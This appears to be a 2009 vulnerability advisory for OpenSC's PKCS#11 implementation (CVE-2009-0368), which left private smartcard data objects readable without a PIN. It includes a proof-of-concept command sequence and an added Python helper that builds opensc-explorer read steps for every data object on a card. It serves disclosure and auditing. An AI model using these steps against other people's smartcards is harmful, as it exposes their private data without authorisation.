Written by Andreas Jellinghaus
Wednesday, 04 March 2009 22:12
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
- Bugtraq ID: 33922
- Class: Design Error
- CVE:
- Remote: No
- Local: Yes
- Published: Feb 26 2009 12:00AM
- Updated: Mar 04 2009 02:16PM
- Credit: Andreas Jellinghaus
- Vulnerable: Pardus Linux 2008 0; OpenSC OpenSC 0.11.6; OpenSC OpenSC 0.11.5; OpenSC OpenSC 0.11.4
- Not Vulnerable: OpenSC OpenSC 0.11.7
- Discussion: OpenSC is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
Versions prior to OpenSC 0.11.7 are vulnerable.
- Exploit(s)/PoC(s): Attackers would need physical access to the smartcard reader.
The following proof of concept is available:
Create a file with a secret:
    echo "This is my secret data" > secret-file
To initialise a blank card:
    pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
To write a private data object to the card:
    pkcs11-tool --label "my secret" --type data --write-object secret-file --private --login --pin 123456
To see all objects on the card:
    pkcs15-tool --dump
This will list the data object, including the path where it is stored, e.g. "Path: 3f0050154701".
To access such an object with low-level tools:
    opensc-explorer
    cd 5015
    get 4701
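Added example, not part of the original advisory: a Python helper that maps the "Path:" values from a `pkcs15-tool --dump` listing onto the opensc-explorer steps shown above, so the same read check can be repeated for every data object on a card you are auditing. The dump layout other than the quoted "Path:" line (here, the "Data object" header) and all function names are assumptions.

```python
import re

# Constructed sample: only the "Path: 3f0050154701" line is quoted from the
# advisory; the "Data object '...'" header layout is an assumption.
SAMPLE_DUMP = """\
Data object 'my secret'
    Path: 3f0050154701
Data object 'notes'
    Path: 3f0050154702
"""

MF = "3f00"  # ISO 7816-4 master file; opensc-explorer starts there


def split_path(path):
    """Split a hex path into 2-byte file IDs, e.g. 3f0050154701 -> 3f00/5015/4701."""
    path = path.strip().lower()
    if not re.fullmatch(r"(?:[0-9a-f]{4})+", path):
        raise ValueError(f"not a sequence of 2-byte file IDs: {path!r}")
    return [path[i:i + 4] for i in range(0, len(path), 4)]


def explorer_steps(path):
    """Return the opensc-explorer commands that reach the file named by path."""
    ids = split_path(path)
    if ids[0] == MF:
        ids = ids[1:]  # already positioned in the MF, no cd needed
    if not ids:
        raise ValueError("path names only the MF")
    *dirs, ef = ids
    return [f"cd {d}" for d in dirs] + [f"get {ef}"]


def data_object_paths(dump_text):
    """Return (label, path) for each data object found in the dump text."""
    found, label = [], None
    for line in dump_text.splitlines():
        header = re.match(r"\s*Data object '(.*)'", line)
        if header:
            label = header.group(1)
            continue
        path = re.match(r"\s*Path\s*:\s*([0-9a-fA-F]+)\s*$", line)
        if path and label is not None:
            found.append((label, path.group(1).lower()))
            label = None  # take only the first Path line per object
    return found


if __name__ == "__main__":
    for label, path in data_object_paths(SAMPLE_DUMP):
        print(label, "->", "; ".join(explorer_steps(path)))
```

A `get` that returns the object without any PIN prompt means that object is exposed as described in the discussion above.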
- Solution: The vendor has released an update. Please see the references for more information.
OpenSC OpenSC 0.11.4: opensc-0.11.7.tar.gz http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
OpenSC OpenSC 0.11.5: opensc-0.11.7.tar.gz http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
OpenSC OpenSC 0.11.6: opensc-0.11.7.tar.gz http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz
- Reference(s):
OpenSC Security Advisory [26-Feb-2009] CVE-2009-0368 http://permalink.gmane.org/gmane.comp.security.oss.general/152 (OpenSC)
Vendor Homepage http://www.opensc-project.org (OpenSC)